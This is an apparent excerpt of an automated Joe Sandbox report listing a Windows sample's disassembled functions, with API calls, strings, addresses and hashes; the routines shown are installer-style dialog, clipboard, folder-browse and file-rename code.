Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: 23aa4ee629d2d375094aa14ebaeeae63623eaa73686822291d3629d93c53ad1e
Instruction ID: 72ab4701d282d41bfb99937ccb951c9b3d992b5a19319da95f503844dddfcbd3
Opcode Fuzzy Hash: 23aa4ee629d2d375094aa14ebaeeae63623eaa73686822291d3629d93c53ad1e
Instruction Fuzzy Hash: EEF0F032804015ABCB20BBA199849DE72B5CF00318B21413FE102B21D1C77C0E42AA6E

Non-executed Functions

Function 0040571B Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 00405779
GetDlgItem.USER32(?,000003EE), ref: 00405788
GetClientRect.USER32(?,?), ref: 004057C5
GetSystemMetrics.USER32(00000002), ref: 004057CC
SendMessageW.USER32(?,00001061,00000000,?), ref: 004057ED
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057FE
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405811
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040581F
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405832
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405854
ShowWindow.USER32(?,00000008), ref: 00405868
GetDlgItem.USER32(?,000003EC), ref: 00405889
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405899
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004058B2
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058BE
GetDlgItem.USER32(?,000003F8), ref: 00405797

Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519

GetDlgItem.USER32(?,000003EC), ref: 004058DB
CreateThread.KERNEL32(00000000,00000000,Function_000056AF,00000000), ref: 004058E9
CloseHandle.KERNEL32(00000000), ref: 004058F0
ShowWindow.USER32(00000000), ref: 00405914
ShowWindow.USER32(?,00000008), ref: 00405919
ShowWindow.USER32(00000008), ref: 00405963
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405997
CreatePopupMenu.USER32 ref: 004059A8
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059BC
GetWindowRect.USER32(?,?), ref: 004059DC
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059F5
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A2D
OpenClipboard.USER32(00000000), ref: 00405A3D
EmptyClipboard.USER32 ref: 00405A43
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A4F
GlobalLock.KERNEL32(00000000), ref: 00405A59
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A6D
GlobalUnlock.KERNEL32(00000000), ref: 00405A8D
SetClipboardData.USER32(0000000D,00000000), ref: 00405A98
CloseClipboard.USER32 ref: 00405A9E

Strings

{, xrefs: 00405981

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 6951b3530aa72caf7521df0bf8db88f5d1408e2bb92485539c1303395de87c8c
Instruction ID: 234ab3d0ec1f6487b719ed7b99e1d6b4405f443d9e8d78e252fa94ab3ac4d3a1
Opcode Fuzzy Hash: 6951b3530aa72caf7521df0bf8db88f5d1408e2bb92485539c1303395de87c8c
Instruction Fuzzy Hash: 34B139B1900608FFDB11AF60DD89AAE7B79FB48355F00813AFA41BA1A0C7785A51DF58

Function 004049C7 Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404A16
SetWindowTextW.USER32(00000000,?), ref: 00404A40
SHBrowseForFolderW.SHELL32(?), ref: 00404AF1
CoTaskMemFree.OLE32(00000000), ref: 00404AFC
lstrcmpiW.KERNEL32(Del,0042CA68,00000000,?,?), ref: 00404B2E
lstrcatW.KERNEL32(?,Del), ref: 00404B3A
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B4C

Part of subcall function 00405B9B: GetDlgItemTextW.USER32(?,?,00000400,00404B83), ref: 00405BAE

Part of subcall function 00406805: CharNextW.USER32(?,*?|<>/":,00000000,0043F000,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
Part of subcall function 00406805: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
Part of subcall function 00406805: CharNextW.USER32(?,0043F000,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
Part of subcall function 00406805: CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F

GetDiskFreeSpaceW.KERNEL32(0042AA38,?,?,0000040F,?,0042AA38,0042AA38,?,00000001,0042AA38,?,?,000003FB,?), ref: 00404C0F
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C2A

Part of subcall function 00404D83: lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
Part of subcall function 00404D83: wsprintfW.USER32 ref: 00404E2D
Part of subcall function 00404D83: SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40

Strings

Del, xrefs: 00404B28, 00404B2D, 00404B38
A, xrefs: 00404AEA

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$Del
API String ID: 2624150263-2818320640
Opcode ID: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
Instruction ID: 8a45afd3ee22384d80319c7ed67abe130e578f1d2b392c1e8909742cb30e522b
Opcode Fuzzy Hash: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
Instruction Fuzzy Hash: FCA192B1900208ABDB11EFA5DD45BAFB7B8EF84314F11803BF611B62D1D77C9A418B69

Function 004021AF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004085E8,?,00000001,004085D8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E

Strings

C:\Users\user\AppData\Local\Temp\nsv4B6.tmp, xrefs: 0040226E

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp
API String ID: 542301482-2998130390
Opcode ID: 54fcaebf65a6d80a769d2ffe25eeb1568fba929b3fba522b5b89cb6b807999ae
Instruction ID: f0c409d0c9855dc16f3492d495f607d4fcaf843261c47ee8c1995525671fe781
Opcode Fuzzy Hash: 54fcaebf65a6d80a769d2ffe25eeb1568fba929b3fba522b5b89cb6b807999ae
Instruction Fuzzy Hash: 76411471A00208AFCB40DFE4C989EAD7BB5FF48308B20457AF515EB2D1DB799982CB54

Function 00402910 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291F

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: f7eec81d6910abfa52e209e80917fba1586809f9bcb970d7ef1d97902b1d379f
Instruction ID: 4f8030157269cd498ea314d5a86e386b0cfb994e1dea9c94a4400a3869289cfc
Opcode Fuzzy Hash: f7eec81d6910abfa52e209e80917fba1586809f9bcb970d7ef1d97902b1d379f
Instruction Fuzzy Hash: 17F08C71A04104AAD701EBE4EE499AEB378EF14324F60457BE102F31E0DBB85E159B2A

Function 00406DC6 Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca9fc840679c4677ea5dd763a2b97f011fd48deb17cd4c9d43ec117c62889360
Instruction ID: a5eb8001d75a17d38d83411349fde439c8a9064fda1b18d7f978e280ae41e255
Opcode Fuzzy Hash: ca9fc840679c4677ea5dd763a2b97f011fd48deb17cd4c9d43ec117c62889360
Instruction Fuzzy Hash: ACE19C71A04709DFCB24CF58C880BAABBF1FF45305F15852EE496A72D1E378AA51CB05

Function 0040759D Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5db23d3e625216a1972a1fea7a98b9ee98c1df0b240da8e2d6c4f39054d3f9c6
Instruction ID: e409ec8ffb443055957628c835c79614664982182129ebc37b3e11cb9bcd83e5
Opcode Fuzzy Hash: 5db23d3e625216a1972a1fea7a98b9ee98c1df0b240da8e2d6c4f39054d3f9c6
Instruction Fuzzy Hash: ECC14772E04219CBCF18CF68C4905EEBBB2BF98354F25866AD85677380D7346942CF95

Function 00404F43 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404F5B
GetDlgItem.USER32(?,00000408), ref: 00404F66
GlobalAlloc.KERNEL32(00000040,?), ref: 00404FB0
LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FC7
SetWindowLongW.USER32(?,000000FC,00405550), ref: 00404FE0
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FF4
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405006
SendMessageW.USER32(?,00001109,00000002), ref: 0040501C
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405028
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 0040503A
DeleteObject.GDI32(00000000), ref: 0040503D
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405068
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405074
SendMessageW.USER32(?,00001132,00000000,?), ref: 0040510F
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040513F

Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519

SendMessageW.USER32(?,00001132,00000000,?), ref: 00405153
GetWindowLongW.USER32(?,000000F0), ref: 00405181
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040518F
ShowWindow.USER32(?,00000005), ref: 0040519F
SendMessageW.USER32(?,00000419,00000000,?), ref: 0040529A
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052FF
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405314
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405338
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405358
ImageList_Destroy.COMCTL32(?), ref: 0040536D
GlobalFree.KERNEL32(?), ref: 0040537D
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053F6
SendMessageW.USER32(?,00001102,?,?), ref: 0040549F
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004054AE
InvalidateRect.USER32(?,00000000,00000001), ref: 004054D9
ShowWindow.USER32(?,00000000), ref: 00405527
GetDlgItem.USER32(?,000003FE), ref: 00405532
ShowWindow.USER32(00000000), ref: 00405539

Strings

M, xrefs: 004050F7
N, xrefs: 004051D8
, xrefs: 00405511

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 14683326fe5d0e21a3b01d942e888f99a0d9647cceadcd168bf81575faddcc86
Instruction ID: 91097811874ce85ba3cc7540bcf7dd58db25a3d6f071223140e4d1ec27d7ea12
Opcode Fuzzy Hash: 14683326fe5d0e21a3b01d942e888f99a0d9647cceadcd168bf81575faddcc86
Instruction Fuzzy Hash: 6C029C70900608AFDF20DF94DD85AAF7BB5FB85314F10817AE611BA2E1D7798A41CF58

Function 00403FD7 Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404013
ShowWindow.USER32(?), ref: 00404033
GetWindowLongW.USER32(?,000000F0), ref: 00404045
ShowWindow.USER32(?,00000004), ref: 0040405E
DestroyWindow.USER32 ref: 00404072
SetWindowLongW.USER32(?,00000000,00000000), ref: 0040408B
GetDlgItem.USER32(?,?), ref: 004040AA
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040BE
IsWindowEnabled.USER32(00000000), ref: 004040C5
GetDlgItem.USER32(?,00000001), ref: 00404170
GetDlgItem.USER32(?,00000002), ref: 0040417A
SetClassLongW.USER32(?,000000F2,?), ref: 00404194
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041E5
GetDlgItem.USER32(?,00000003), ref: 0040428B
ShowWindow.USER32(00000000,?), ref: 004042AC
EnableWindow.USER32(?,?), ref: 004042BE
EnableWindow.USER32(?,?), ref: 004042D9
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042EF
EnableMenuItem.USER32(00000000), ref: 004042F6
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040430E
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404321
lstrlenW.KERNEL32(0042CA68,?,0042CA68,00000000), ref: 0040434B
SetWindowTextW.USER32(?,0042CA68), ref: 0040435F
ShowWindow.USER32(?,0000000A), ref: 00404493

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 1860320154-0
Opcode ID: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
Instruction ID: 911e0a6aef898d83942fe666095560f38e6effa11f08765efd6836b1f10f2e9c
Opcode Fuzzy Hash: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
Instruction Fuzzy Hash: 29C1B0B1500204BBDB206F61EE89A2B3A68FB85756F01053EF781B51F0CB3958929B2D

Function 00404695 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404733
GetDlgItem.USER32(?,000003E8), ref: 00404747
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404764
GetSysColor.USER32(?), ref: 00404775
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404783
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404791
lstrlenW.KERNEL32(?), ref: 00404796
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004047A3
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047B8
GetDlgItem.USER32(?,0000040A), ref: 00404811
SendMessageW.USER32(00000000), ref: 00404818
GetDlgItem.USER32(?,000003E8), ref: 00404843
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404886
LoadCursorW.USER32(00000000,00007F02), ref: 00404894
SetCursor.USER32(00000000), ref: 00404897
LoadCursorW.USER32(00000000,00007F00), ref: 004048B0
SetCursor.USER32(00000000), ref: 004048B3
SendMessageW.USER32(00000111,00000001,00000000), ref: 004048E2
SendMessageW.USER32(00000010,00000000,00000000), ref: 004048F4

Strings

N, xrefs: 00404831
Del, xrefs: 00404872

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: Del$N
API String ID: 3103080414-1189654992
Opcode ID: 04e13e5971a3aaf2d7c3f6bec99ed017c89c89abbf6057be99a5caf0d4384f9a
Instruction ID: 3ad42440e7936429012ccc374b67200ab01768f99e4ad58672f49272ac14a637
Opcode Fuzzy Hash: 04e13e5971a3aaf2d7c3f6bec99ed017c89c89abbf6057be99a5caf0d4384f9a
Instruction Fuzzy Hash: 2E6181B1900209BFDB10AF60DD85EAA7B69FB84315F00853AFA05B62D0C779A951DF98

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00433700,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
Instruction ID: eca0ad76d85821e0a7fbe67f508e5060b260b918cc65b70bf06bca200ae74670
Opcode Fuzzy Hash: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
Instruction Fuzzy Hash: 2F418B71800209AFCB058FA5DE459AFBFB9FF45314F00802EF591AA1A0C738EA54DFA4

Function 0040619D Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406338,?,?), ref: 004061D8
GetShortPathNameW.KERNEL32(?,00430108,00000400), ref: 004061E1

Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE

GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061FE
wsprintfA.USER32 ref: 0040621C
GetFileSize.KERNEL32(00000000,00000000,00430908,C0000000,00000004,00430908,?,?,?,?,?), ref: 00406257
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406266
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040629E
SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,0042FD08,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062F4
GlobalFree.KERNEL32(00000000), ref: 00406305
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040630C

Part of subcall function 00406047: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\4hIPvzV6a2.exe,80000000,00000003), ref: 0040604B
Part of subcall function 00406047: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D

Strings

[Rename], xrefs: 00406286, 00406298
%ls=%ls, xrefs: 00406212

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
